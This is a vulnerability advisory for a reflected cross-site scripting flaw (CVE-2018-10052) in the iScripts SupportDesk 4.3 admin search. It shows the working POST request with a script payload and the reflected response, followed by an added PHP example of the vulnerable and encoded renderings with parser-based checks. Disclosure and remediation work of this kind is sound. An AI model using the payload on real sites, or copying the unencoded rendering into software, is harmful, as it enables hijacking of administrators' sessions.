- # Exploit title: iScripts SupportDesk v4.3 - XSS via the getInteligentSearch() Admin Panel
- # Date: 11/04/2018
- # Exploit Author: ManhNho
- # Vendor Homepage: https://www.iscripts.com
- # Software Link: https://www.iscripts.com/supportdesk/
- # Demo Link: https://www.demo.iscripts.com/supportdesk/demo/admin/adminmain.php
- # Version: 4.3
- # CVE: CVE-2018-10052
- # Tested on: Windows 10 / Kali Linux
- # Category: Webapps
- #1. Description
- -----------------------------------------------------
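- iScripts SupportDesk v4.3 has XSS via the getInteligentSearch() function parameter in the Admin Panel: the txtinteligentsearch value sent in the POST request is reflected into the value attribute of the search input without HTML encoding.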
- #2. Proof of Concept
- -----------------------------------------------------
- Request:
- POST /supportdesk/demo/admin/inteligentsearchresult.php HTTP/1.1
- Host: www.demo.iscripts.com
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-GB,en;q=0.5
- Accept-Encoding: gzip, deflate
- Referer: https://www.demo.iscripts.com/supportdesk/demo/admin/adminmain.php
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 98
- Cookie: __utma=227100805.298811387.1522637403.1523415936.1523431492.7; __utmz=227100805.1522637403.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); messagesUtk=9ae2fcc5306f4d9c8d433f0f58efb968; PHPSESSID=44f6a6jfopm97kfrv7ccsfqub2; __utmc=227100805; __utma=129714457.1603653646.1523416273.1523416273.1523416273.1; __utmc=129714457; __utmz=129714457.1523416273.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=227100805; hs-messages-is-open=false
- Connection: close
- Upgrade-Insecure-Requests: 1
- txtinteligentsearch=%22%3E%3Cscript%3Ealert%28%271%27%29%3C%2Fscript%3E&btninteligentsearch=Search
- Response:
- HTTP/1.1 200 OK
- Date: Wed, 11 Apr 2018 07:41:19 GMT
- Server: Apache
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Connection: close
- Content-Type: text/html
- Content-Length: 70324
- ...
- <form name="frminteligentsearch" id="frminteligentsearch" action="https://www.demo.iscripts.com/supportdesk/demo/admin/inteligentsearchresult.php" method="post">
- <div class="intelligentsearch"><input type="text" name="txtinteligentsearch" id="txtinteligentsearch" class="topsearch_input width1" value=""><script>alert('1')</script>">
- ...
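
The response above shows the submitted value placed inside the value="..." attribute unencoded, so its leading quote closes the attribute. The following is an added example, not iScripts code and not part of the original advisory: it renders the same field with and without output encoding and checks the parsed result. The function names are hypothetical, and PHP is assumed because the affected endpoint is a .php script.

```php
<?php
// Added illustration, not iScripts source. Function names are hypothetical;
// the input's name, id and class are copied from the response shown above.
// Requires PHP's DOM extension for the self-check at the end.

// Before: the request value is concatenated into the attribute as-is.
function render_search_unsafe(string $term): string
{
    return '<input type="text" name="txtinteligentsearch" id="txtinteligentsearch"'
        . ' class="topsearch_input width1" value="' . $term . '">';
}

// After: encode for the HTML attribute context at the point of output.
// ENT_QUOTES covers both quote characters; the charset is stated explicitly.
function render_search_safe(string $term): string
{
    $encoded = htmlspecialchars($term, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="txtinteligentsearch" id="txtinteligentsearch"'
        . ' class="topsearch_input width1" value="' . $encoded . '">';
}

// Parse a fragment with an HTML parser and report what it turned into.
function inspect_fragment(string $html): array
{
    libxml_use_internal_errors(true);   // keep parser notices out of the output
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    $input = $doc->getElementsByTagName('input')->item(0);
    return [
        'script_elements' => $doc->getElementsByTagName('script')->length,
        'input_value'     => $input->getAttribute('value'),
    ];
}

// Value of txtinteligentsearch from the request above, decoded as PHP exposes it in $_POST.
$term = urldecode('%22%3E%3Cscript%3Ealert%28%271%27%29%3C%2Fscript%3E');

$before = inspect_fragment(render_search_unsafe($term));
$after  = inspect_fragment(render_search_safe($term));

// Unencoded: the quote ends the attribute and the markup becomes a real element.
if ($before['script_elements'] !== 1 || $before['input_value'] !== '') {
    throw new RuntimeException('unsafe rendering did not match the advisory response');
}
// Encoded: no element is created and the field still shows exactly what was typed.
if ($after['script_elements'] !== 0 || $after['input_value'] !== $term) {
    throw new RuntimeException('encoded rendering altered or leaked the value');
}
echo render_search_safe($term), PHP_EOL;
```

The same two checks work as a regression test after patching: the parsed page must contain no new elements, and the field must still display the search term exactly as entered.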